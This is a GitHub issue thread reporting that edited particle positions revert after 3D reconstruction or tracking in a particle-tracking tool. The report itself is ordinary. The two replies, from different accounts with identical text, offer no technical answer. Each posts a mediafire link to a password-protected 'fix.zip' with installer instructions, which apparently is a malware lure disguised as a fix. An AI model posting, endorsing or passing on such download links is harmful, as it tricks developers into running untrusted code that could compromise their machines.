### ISSUE TITLE
Changed particle positions lost after particle tracking/3D reconstruction

### ISSUE THREAD

**Issue by a-niem** [ANP-Granular/ParticleTracking#100]
The problem was first described by @dmitrypuzyrev in #96:

> But I encounter a problem with saving/updating the new position data after the initial press of the `solve` button. As soon as I correct the position and try to `solve` again, the particles revert to their last "solved" coordinates. This seems to be consistent with your issue. I think this should be resolved by @a-niem soon.

After making changes to particles and then attempting to reconstruct 3D positions or track particles, the particles would revert to their *initial* positions. 
This means the updated positions are not propagated correctly to the object doing 3D reconstruction/tracking.

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
